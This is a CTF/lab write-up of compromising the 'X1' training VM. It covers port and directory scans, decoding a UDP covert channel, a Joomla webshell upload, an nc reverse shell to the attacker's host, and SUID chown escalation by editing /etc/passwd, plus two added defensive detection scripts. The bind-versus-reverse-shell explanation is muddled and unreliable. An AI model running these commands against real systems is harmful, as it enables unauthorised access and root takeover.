X1 Target Machine Write-up

1. Information Gathering

1.1 Port scan:
┌──(root㉿kali)-[~]
└─# nmap -sV -A -sS -p- 192.168.215.173
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-22 01:02 EDT
Nmap scan report for 192.168.215.173
Host is up (0.00058s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
| http-robots.txt: 16 disallowed entries (15 shown)
| /joomla/administrator/ /administrator/ /api/ /bin/
| /cache/ /cli/ /components/ /includes/ /installation/
|_/language/ /layouts/ /libraries/ /logs/ /modules/ /plugins/
|_http-server-header: Apache/2.4.62 (Debian)
|_http-generator: Joomla! - Open Source Content Management
|_http-title: Home
MAC Address: 08:00:27:AD:B7:1A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.58 ms 192.168.215.173

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.08 seconds

The scan shows ports 22 (SSH) and 80 (HTTP) open.

1.2 Directory scan
┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.215.173/ -w /usr/share/wordlists/dirb/common.txt -x php,txt,zip
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.215.173/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,zip
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 280]
/.hta.txt (Status: 403) [Size: 280]
/.hta (Status: 403) [Size: 280]
/.htaccess (Status: 403) [Size: 280]
/.htaccess.zip (Status: 403) [Size: 280]
/.hta.zip (Status: 403) [Size: 280]
/.hta.php (Status: 403) [Size: 280]
/.htpasswd.php (Status: 403) [Size: 280]
/.htpasswd.zip (Status: 403) [Size: 280]
/.htpasswd (Status: 403) [Size: 280]
/.htaccess.txt (Status: 403) [Size: 280]
/.htaccess.php (Status: 403) [Size: 280]
/.htpasswd.txt (Status: 403) [Size: 280]
/administrator (Status: 301) [Size: 326] [--> http://192.168.215.173/administrator/]
/api (Status: 301) [Size: 316] [--> http://192.168.215.173/api/]
/cache (Status: 301) [Size: 318] [--> http://192.168.215.173/cache/]
/components (Status: 301) [Size: 323] [--> http://192.168.215.173/components/]
/configuration.php (Status: 200) [Size: 0]
/files (Status: 301) [Size: 318] [--> http://192.168.215.173/files/]
/images (Status: 301) [Size: 319] [--> http://192.168.215.173/images/]
/includes (Status: 301) [Size: 321] [--> http://192.168.215.173/includes/]
/index.php (Status: 200) [Size: 9102]
/index.php (Status: 200) [Size: 9102]
/language (Status: 301) [Size: 321] [--> http://192.168.215.173/language/]
/layouts (Status: 301) [Size: 320] [--> http://192.168.215.173/layouts/]
/libraries (Status: 301) [Size: 322] [--> http://192.168.215.173/libraries/]
/LICENSE.txt (Status: 200) [Size: 18092]
/media (Status: 301) [Size: 318] [--> http://192.168.215.173/media/]
/modules (Status: 301) [Size: 320] [--> http://192.168.215.173/modules/]
/plugins (Status: 301) [Size: 320] [--> http://192.168.215.173/plugins/]
/README.txt (Status: 200) [Size: 5034]
/robots.txt (Status: 200) [Size: 764]
/robots.txt (Status: 200) [Size: 764]
/server-status (Status: 403) [Size: 280]
/templates (Status: 301) [Size: 322] [--> http://192.168.215.173/templates/]
/tmp (Status: 301) [Size: 316] [--> http://192.168.215.173/tmp/]
/web.config.txt (Status: 200) [Size: 2974]
Progress: 18456 / 18460 (99.98%)
===============================================================
Finished
===============================================================

The directory scan revealed an admin backend; a few weak passwords were tried there without success, and nothing else useful turned up. But the web home page (it is a Joomla site) shows the word "Shark?", which presumably hints at packet capture.

2. Vulnerability Discovery and Exploitation

Capture traffic with tcpdump:

tcpdump -A -n host 192.168.215.173

  • -A: print packet contents as ASCII (suited to viewing HTTP and other plaintext protocols)
  • -n: do not resolve IP addresses and port numbers to names (avoids DNS lookups)
  • host 192.168.215.173: capture filter, only traffic to or from the given host
┌──(root㉿kali)-[~]
└─# tcpdump -A -n host 192.168.215.173
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
01:14:00.568387 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...].@.@.D..........f... 1.r.................
01:14:01.568918 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...^B@.@.D8.........f... 4.o.................
01:14:02.569864 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...^.@.@.C..........f... 4.o.................
01:14:03.555984 ARP, Reply 192.168.215.149 is-at be:90:0d:14:3a:ef, length 46
............:.......'.........................
01:14:03.570485 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E..._.@.@.B..........f... /.t.................
01:14:04.571266 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E..._.@.@.B..........f... i.:.................
01:14:05.572639 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...`.@.@.A..........f... s.0.................
01:14:06.573245 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...`.@.@.A..........f... s.0.................
01:14:07.575612 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...a @.@.Aq.........f... ?.d.................
01:14:08.575261 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...a.@.@.@..........f... B.a.................
01:14:09.575737 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...b/@.@.@K.........f... >.e.................
01:14:10.576951 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...b.@.@.?..........f... j.9.................
01:14:11.577919 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...c.@.@.?z.........f... >.e.................
01:14:12.579059 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...cb@.@.?..........f... p.3.................
01:14:13.579527 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...c.@.@.>..........f... s.0.................
01:14:14.580549 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...d~@.@.=..........f... n.5.................
01:14:15.581968 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...d.@.@.=..........f... q.2.................
01:14:16.582744 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...e3@.@.=G.........f... =.f.................
01:14:17.582799 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...e.@.@.<..........f... A.b.................
01:14:18.582829 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...fl@.@.<..........f... q.2.................
01:14:19.583656 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...f.@.@.;..........f... q.2.................
01:14:20.584942 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...g.@.@.;v.........f... n.5.................
01:14:21.584519 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...g.@.@.:..........f... n.5.................
01:14:22.585250 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...hx@.@.:..........f... o.4.................
01:14:23.586363 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...i#@.@.9W.........f... s.0.................
01:14:24.587307 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...i.@.@.8..........f... k.8.................
01:14:25.588206 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...i.@.@.8..........f... r.1.................
01:14:26.589368 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...i.@.@.8..........f... k.8.................
01:14:27.589576 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...j.@.@.7..........f... q.2.................
01:14:28.589566 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...kF@.@.74.........f... m.6.................
01:14:29.590355 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...l4@.@.6F.........f... s.0.................
01:14:30.591045 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...l.@.@.5..........f... q.2.................
01:14:31.591903 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...m#@.@.5W.........f... p.3.................
01:14:32.592596 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...m.@.@.4..........f... k.8.................
01:14:33.593930 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...n.@.@.3..........f... p.3.................
01:14:34.594443 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...o|@.@.2..........f... @.c.................
01:14:35.594870 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...o.@.@.2..........f... >.e.................
01:14:36.595925 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...p.@.@.2u.........f... r.1.................
01:14:37.071817 ARP, Reply 192.168.215.149 is-at be:90:0d:14:3a:ef, length 46
............:.......'.........................

This stream of packets is very regular (one single-byte UDP datagram per second to the broadcast address), so redirect it into a text file (wait a while, about 2 minutes, then press Ctrl+C):

tcpdump -A -n host 192.168.215.173 > demo

Then filter it with awk (with FS set to the empty string every character becomes a field; each -A line is 46 characters, so $(NF-17) is the 29th character, i.e. the single UDP payload byte that follows the 20-byte IP header and the 8-byte UDP header):

cat demo | awk 'BEGIN{FS=""}/^E/{printf "%s", $(NF-17)}' 2>/dev/null

Supplementary (optional):

Check the string length:

echo -n 00dae9e3052fb2255408182602383ce1 |wc -c
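As an added example (not part of the original write-up), the following Python script does what the awk one-liner above does, but derives the payload offset from the packet itself instead of relying on a fixed line length, and adds the angle a defender would want: it groups one-byte UDP datagrams per flow, reconstructs the characters they carry and measures the interval between them, which is how a byte-at-a-time covert channel like this one is spotted. The sample capture embedded in it is the first packets of the tcpdump output above, copied in as constructed input; the function and variable names are my own.

```python
import re

# Constructed sample: the first packets of the `tcpdump -A -n host <target>` capture, as the
# tool prints them (a summary line followed by the ASCII rendering of the IPv4 packet).
# tcpdump shows non-printable bytes as '.', so only printable payload bytes survive here.
SAMPLE_CAPTURE = """\
01:14:00.568387 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...].@.@.D..........f... 1.r.................
01:14:01.568918 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...^B@.@.D8.........f... 4.o.................
01:14:02.569864 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...^.@.@.C..........f... 4.o.................
01:14:03.555984 ARP, Reply 192.168.215.149 is-at be:90:0d:14:3a:ef, length 46
............:.......'.........................
01:14:03.570485 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E..._.@.@.B..........f... /.t.................
01:14:04.571266 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E..._.@.@.B..........f... i.:.................
01:14:05.572639 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...`.@.@.A..........f... s.0.................
01:14:06.573245 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...`.@.@.A..........f... s.0.................
01:14:07.575612 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...a @.@.Aq.........f... ?.d.................
01:14:08.575261 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...a.@.@.@..........f... B.a.................
01:14:09.575737 IP 192.168.215.173.45158 > 255.255.255.255.5000: UDP, length 1
E...b/@.@.@K.........f... >.e.................
"""

# Summary line of a UDP datagram as printed by `tcpdump -n` (IPv4, no name resolution).
UDP_SUMMARY = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) IP (?P<src>[\d.]+)\.(?P<sport>\d+) > "
    r"(?P<dst>[\d.]+)\.(?P<dport>\d+): UDP, length (?P<length>\d+)$"
)


def _seconds(ts):
    """Convert a tcpdump HH:MM:SS.ffffff timestamp to seconds since midnight."""
    h, m, s = ts.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)


def udp_payload_from_ascii(ascii_line, udp_length):
    """Return the payload characters from tcpdump's -A rendering of one IPv4/UDP packet.

    The first header byte holds version and IHL; 0x45 prints as 'E' and means a 20-byte
    IP header. The payload follows that header plus the 8-byte UDP header; anything after
    it is Ethernet frame padding, which is why a fixed offset from the end of the line
    (the awk $(NF-17) trick) also works for this capture.
    """
    ihl_words = ord(ascii_line[0]) & 0x0F
    offset = ihl_words * 4 + 8
    return ascii_line[offset:offset + udp_length]


def find_byte_beacons(capture_text, min_packets=5):
    """Detect flows made of repeated one-byte UDP datagrams and rebuild what they carry.

    Returns {(src, dst, dport): {"stream": str, "packets": int, "mean_interval": float}}
    for every flow with at least `min_packets` single-byte datagrams.
    """
    flows = {}
    lines = capture_text.splitlines()
    for i, line in enumerate(lines):
        m = UDP_SUMMARY.match(line)
        if not m or i + 1 >= len(lines):
            continue
        length = int(m["length"])
        if length != 1:
            continue
        key = (m["src"], m["dst"], int(m["dport"]))
        flow = flows.setdefault(key, {"chars": [], "times": []})
        flow["chars"].append(udp_payload_from_ascii(lines[i + 1], length))
        flow["times"].append(_seconds(m["ts"]))

    report = {}
    for key, flow in flows.items():
        n = len(flow["chars"])
        if n < min_packets:
            continue
        gaps = [b - a for a, b in zip(flow["times"], flow["times"][1:])]
        report[key] = {
            "stream": "".join(flow["chars"]),
            "packets": n,
            "mean_interval": sum(gaps) / len(gaps) if gaps else 0.0,
        }
    return report


if __name__ == "__main__":
    for (src, dst, dport), info in find_byte_beacons(SAMPLE_CAPTURE).items():
        print(f"{src} -> {dst}:{dport}: {info['packets']} packets, "
              f"every {info['mean_interval']:.2f}s, leaked text {info['stream']!r}")
```

Run stand-alone it reports the sample flow; on a real capture, pass the contents of the `demo` file to `find_byte_beacons`. On a production network the same pattern, one host sending one-byte datagrams to a broadcast address every second, stands out in flow records long before anyone decodes the bytes, which is the cheaper place to catch it.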

Tried to log in as root over SSH with it and it did not work (if that had succeeded, this challenge would have been far too easy), so log in to the admin page found by the directory scan instead. A Chinese language pack is available there (the group owner is quite considerate, haha).

3. Getting a Shell

The system admin panel offers extension upload (the idea here is much like WordPress).

As noted during information gathering, the site is built on Joomla, so search for a Joomla webshell plugin.

Download it.

Upload:

Getshell usage:

Successful exploitation:

Reverse shell:

Note here that the reverse shell command is

nc 192.168.215.222 4444 -e /bin/bash

and how it differs from nc -e /bin/bash 192.168.215.222 4444

Effect of argument order

1. Forward shell (bind shell): nc 192.168.215.222 4444 -e /bin/bash
Function: this command tries to connect to port 4444 on the given IP (192.168.215.222) and expects the target host to already have a shell bound on that port.
Scenario: typically used by an attacker to connect actively to a target machine that has already exposed a shell service.

2. Reverse shell: nc -e /bin/bash 192.168.215.222 4444
Function: this command actively connects to port 4444 on the given IP (192.168.215.222) and hands the local bash shell over that connection.
Scenario: typically used by the controlled end (e.g. the victim machine) to connect out to the attacker's listener, forming reverse control.

4. Privilege Escalation

Checked sudo and found nothing. Checked SUID binaries and found a chown binary:

find / -perm -u=s -type f 2>/dev/null

chown:

The command that changes the owner and group of a file or directory:

chown www-data:www-data /etc/passwd

On Kali, generate a hash for a password you know; note that every run produces a different hash (the salt does not stop it from working):

openssl passwd 123456

Change root's password entry and obtain a root shell:

www-data@X1:/$ vim /etc/passwd
www-data@X1:/$ su root
Password:
root@X1:/# id
uid=0(root) gid=0(root) groups=0(root)
root@X1:/#

Overall approach:

  1. Use the SUID chown to make /etc/passwd owned by the www user (which gives www write access to it)
  2. Generate a password hash on Kali and use it to replace the x (the password placeholder) after root
  3. Log in to the target as root with the password you generated

5. Summary

Early and mid stages: the way to get a shell on this box is very similar to the WordPress-related labs, with one extra packet-capture step; I solved that with tcpdump and awk. Wireshark would also do for the capture, but it is more cumbersome.

Late stage: a SUID privilege escalation, essentially using the chown command so that the www user can change root's password. However:

  • Normal systems: directly modifying the password field in /etc/passwd does not take effect, because the system still uses /etc/shadow
  • Abnormal cases: only when /etc/shadow is missing or has wrong permissions can a change to /etc/passwd take effect, and that is a serious security hole
  • Never hand-edit /etc/passwd or /etc/shadow; always manage passwords with tools such as passwd or usermod.
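The summary's point about /etc/passwd versus /etc/shadow is also what an auditor checks for. As an added example, not from the original write-up, the Python script below looks for the traces this privilege escalation leaves behind: a password hash sitting in the second field of /etc/passwd, extra UID 0 accounts, a passwd file that is not owned by root or is writable by others, and SUID binaries (such as chown on this box) that are not on a baseline allowlist. The sample passwd content and the hash in it are constructed placeholders; EXPECTED_SUID is an assumed Debian-style baseline that you would tune to your own systems.

```python
import os
import stat

# Constructed sample of an /etc/passwd as it might look after the technique in this write-up:
# root's password field carries a crypt-style hash (a placeholder here, not a real one) instead
# of the "x" that defers to /etc/shadow, and a second UID 0 account has been added.
SAMPLE_PASSWD = """\
root:$1$placeholdersalt$PLACEHOLDERHASHNOTREAL0:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backdoor:x:0:1001::/home/backdoor:/bin/bash
"""

# Assumed baseline of SUID binaries that are normal on a stock Debian install; tune this to
# your own systems. A SUID chown, as found on this box, belongs on no such baseline.
EXPECTED_SUID = {
    "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/sudo", "/usr/bin/mount", "/usr/bin/umount",
    "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp",
}


def audit_passwd_entries(text):
    """Return (username, reason) findings for suspicious lines in /etc/passwd content."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line, "malformed entry"))
            continue
        user, password, uid = fields[0], fields[1], fields[2]
        if password == "":
            findings.append((user, "empty password field"))
        elif password not in ("x", "*", "!", "!!"):
            findings.append((user, "password hash stored in /etc/passwd instead of /etc/shadow"))
        if uid == "0" and user != "root":
            findings.append((user, "additional UID 0 account"))
    return findings


def audit_passwd_metadata(path="/etc/passwd"):
    """Check that the file is owned by root and not writable by group or others."""
    st = os.stat(path)
    problems = []
    if st.st_uid != 0:
        problems.append(f"{path} is owned by uid {st.st_uid}, expected root (uid 0)")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        problems.append(f"{path} is writable by group or others")
    return problems


def find_suid_files(root="/"):
    """Equivalent of `find / -perm -u=s -type f`: regular files with the SUID bit set."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return hits


def unexpected_suid(found, expected=EXPECTED_SUID):
    """Return SUID files that are not on the baseline, sorted for stable output."""
    return sorted(set(found) - set(expected))


if __name__ == "__main__":
    for user, reason in audit_passwd_entries(SAMPLE_PASSWD):
        print(f"[passwd] {user}: {reason}")
    for problem in audit_passwd_metadata():
        print(f"[passwd] {problem}")
    for path in unexpected_suid(find_suid_files("/usr")):
        print(f"[suid] not on baseline: {path}")
```

Run as root on a live host it audits the real /etc/passwd and walks /usr for SUID files; pointing `audit_passwd_entries` at the sample shows what the edited root entry and a spare UID 0 account look like to the check. The passwd ownership test is the direct counterpart of the chown step above: a passwd file owned by anyone but root is already a compromise indicator, whatever its contents.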

X1 Target Machine Write-up
http://example.com/2025/05/22/X1靶机复盘/
Author
XCDH
Published
May 22, 2025
License